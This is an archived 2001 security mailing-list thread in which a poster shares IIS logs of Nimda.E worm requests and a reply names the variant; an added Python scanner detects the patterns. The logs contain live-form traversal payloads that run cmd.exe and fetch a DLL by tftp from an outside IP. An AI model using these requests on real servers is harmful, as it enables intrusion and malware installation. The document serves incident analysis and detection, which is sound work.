RE: New Worm Variant?
From: Kester, Kelly (KesterK@scott.disa.mil)
Date: 10/30/01
- Previous message: Aj Effin Reznor: "New Worm Variant?"
- Maybe in reply to: Aj Effin Reznor: "New Worm Variant?"
- Next in thread: Ryan Russell: "Re: New Worm Variant?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <3D2B4A576AA7D411B9F100B0D0496D8F011CFD9E@emssct2.scott.disa.mil>
From: "Kester, Kelly" <KesterK@scott.disa.mil>
To: 'Aj Effin Reznor' <aj@reznor.com>, incidents@securityfocus.com
Subject: RE: New Worm Variant?
Date: Tue, 30 Oct 2001 08:56:16 -0600
NIMDA.E (new variant)
http://www.sarc.com/avcenter/venc/data/w32.nimda.e@mm.html
-----Original Message-----
From: Aj Effin Reznor [mailto:aj@reznor.com]
Sent: Tuesday, October 30, 2001 1:20 AM
To: incidents@securityfocus.com
Subject: New Worm Variant?
Anyone seen a new worm doing something like this?
Checking back through my logs, I haven't had a NIMDA instance yet looking for httpodbc.dll. Caught my eye. Anyone else? (Yes, some produce a code 200 rather than 404; that's to be expected on this system.)
Log times are in PST.
[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
[29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
[29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0" 200 442 "-" "-"
[29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
[29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
-aj.
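Added example, not part of the original thread: a small Python scanner that normalizes the encodings seen in the log above (double percent-encoding such as %255c and %25%35%63, and the overlong UTF-8 slash forms %c0%af, %c1%1c, %c1%9c) and tags each request with the Nimda.E-style indicators it carries (traversal, cmd.exe/root.exe invocation, tftp fetch, httpodbc.dll probe). The sample lines are copied from the log above plus one constructed benign request; the scanner keys on the request URI rather than the status code because, as the post notes, 200 versus 404 depends on the server.

```python
import re
from urllib.parse import unquote_to_bytes

# Sample input: four entries copied from the log quoted above, plus one
# constructed benign request so a clean line is exercised too.
SAMPLE_LOG = """\
[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:20:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

# Matches the access-log shape used in the post: [ts] "METHOD uri HTTP/x" status ...
LOG_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Byte sequences that IIS accepted as a path separator (seen in the log above).
OVERLONG_SLASH = (b"\xc0\xaf", b"\xc0\x2f", b"\xc1\x1c", b"\xc1\x9c")

def normalize(uri):
    """Decode twice (so %255c -> %5c -> '\\'), fold overlong-UTF-8 and
    backslash separators to '/', and lowercase, so every variant compares equal."""
    raw = unquote_to_bytes(unquote_to_bytes(uri))
    for seq in OVERLONG_SLASH:
        raw = raw.replace(seq, b"/")
    return raw.replace(b"\\", b"/").decode("latin-1").lower()

def classify(uri):
    """Return the set of Nimda.E-style indicators present in one request URI."""
    norm = normalize(uri)
    path, _, query = norm.partition("?")
    tags = set()
    if "/../" in path:
        tags.add("traversal")            # directory traversal after decoding
    if path.endswith(("/cmd.exe", "/root.exe")):
        tags.add("shell")                # command interpreter reached via web root
    if query.startswith("/c+tftp"):
        tags.add("tftp_fetch")           # payload retrieval step
    if "httpodbc.dll" in norm:
        tags.add("httpodbc")             # the new filename the post asks about
    return tags

def scan(log_text):
    """Return (timestamp, status, sorted tags) for every line carrying an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m.group("uri"))):
            hits.append((m.group("ts"), int(m.group("status")), sorted(tags)))
    return hits
```

Note that the 400-status line is still flagged: a rejected traversal attempt is evidence of the scan even when the server refused it.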
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com